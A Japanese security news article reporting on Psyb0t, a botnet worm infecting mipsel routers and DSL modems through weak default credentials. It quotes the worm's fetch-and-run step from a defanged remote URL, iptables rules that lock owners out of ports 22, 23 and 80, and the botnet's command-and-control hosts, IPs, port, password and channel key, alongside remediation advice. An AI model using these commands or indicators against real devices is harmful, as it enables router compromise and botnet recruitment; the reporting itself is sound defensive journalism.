SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム | ScanNetSecurity
2026.05.15(金)

SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム

 SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。

国際 海外情報
27 views
facebookLINE
 SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。

──

 ダン・カミンスキーがDNSプロトコルの脆弱性を指摘してから一年ほど経つ。もともと学術用として開発されたインターネットで使用されているプロトコルの多くは、大幅なアップデートもされることなく現在でも使用されている。インターネットというインフラ自体の脆弱性をカミンスキー氏は指摘した訳だが、今回と次回の2回にわたって、インフラを対象とした新種の攻撃をレポートしたい。

 まずは、Psyb0t(サイボット)と呼ばれるルータ専用のワーム。ルータを攻撃対象としたボットネット・ワームはこれが初めてで、このワームは最初、主にオーストラリアで販売されているルータ Netcomm NB5に感染していることが発見され、1月にTerry Baume氏が論文を書いている。その後、攻撃に脆弱性を持つのは、「Linux mipselのルータで、ルータ管理インターフェイスがあるか、DMZにsshdかtelnetdができ、ユーザーネームとパスワードがデフォルトであるなど弱い組み合わせであるもの」ということが分かっている。mipselとは、MIPSがlittle-endian modeで動作しているもので、OpenWRT and DD-WRTなどのカスタムファームウェアを動作させているものも危ない。

 現在までに10万台のモデムが被害にあっていると、感染マシンの乱用を阻止することを目的にIPアドレスをリアルタイムで監視しているDroneBLでは推測している。

 さてその感染方法だが、まずワームはユーザーネームとパスワードを、ブルートフォース、パケット検査等の数種類の攻撃方法を使用して手に入れる。次にshellを使用する。そして

# rm -f /var/tmp/udhcpc.env
# wget

して、wget がある場合 hxxp://dweb.webhop.net/.bb/udhcpc.env をダウンロードしてこれを走らす。wget がない場合は、 "busybox ftpget" を探し出してtftpクライアントを使い、同様に上記プログラムをダウロードする。そして、

# iptables -A INPUT -p tcp ─dport 23 -j DROP
# iptables -A INPUT -p tcp ─dport 22 -j DROP
# iptables -A INPUT -p tcp ─dport 80 -j DROP

して、ユーザーをルータから排除する。

 これで分かるように、ルータが感染された症状としてポート23, 22, 80がブロックされてしまう。これらのポートがブロックされていたら、Psyb0tの感染と疑い、ルータをハードリセットし、パスワードを変更して最新のファームウェアにアップデートすることが必要だ。

 さて、一度ルータが感染されると、そのルータはIRCボットネットになってしまう。

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

 このPsyb0tについて、1月に論文を書いたTerry Baume氏によれば、
strcpy.us.toのサーバーは

strcpy.us.to = 202.71.102.110 (Malaysia)
strcpy.us.to = 202.67.218.33 (Hong Kong)
strcpy.us.to = 216.199.217.170 (USA)
strcpy.us.to = 207.155.1.5 (USA)

らのラウンドロビンになっているそうだ。

 オーストラリアのパーソナルコンピュータマガジン Apcmag では、最新のバージョン18では、30種類のLynksys、10種類のNetgear、そしてその他15種類のケーブルやDSLモデムのシェルコードを内蔵しているとレポートしており、ブルートフォース用のユーザーネームが全部で6,000個、パスワードも13,000個も含まれていたそうだ。

 さて面白いことに、このボットネット感染劇には以下のように、3月22日に終わっている…

【執筆:米国 笠原利香】

【関連リンク】
Terry Baume氏論文
http://www.adam.com.au/bogaurd/PSYB0T.pdf
DroneBLブログ
http://www.dronebl.org/blog/
APC Magazine記事
http://apcmag.com/Content.aspx?id=3687
Dan Kaminskyブログ
http://www.doxpara.com/?p=1283
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw

《ScanNetSecurity》

PageTop

アクセスランキング

  1. マネーフォワードが利用する「GitHub」の認証情報が漏えい、リポジトリがコピーされる

    マネーフォワードが利用する「GitHub」の認証情報が漏えい、リポジトリがコピーされる

  2. 日本テレネットにランサムウェア型サイバー攻撃、サーバのファイルの一部が暗号化

    日本テレネットにランサムウェア型サイバー攻撃、サーバのファイルの一部が暗号化

  3. エフワンにランサムウェア攻撃、約 17 万件の個人情報が流出

    エフワンにランサムウェア攻撃、約 17 万件の個人情報が流出

  4. 東京精密の米国グループ会社にランサムウェア攻撃

    東京精密の米国グループ会社にランサムウェア攻撃

  5. 第一工業にサイバー攻撃、一部のサーバでシステム障害が発生

    第一工業にサイバー攻撃、一部のサーバでシステム障害が発生

ランキングをもっと見る
PageTop
ホーム 国際 海外情報 記事
TOP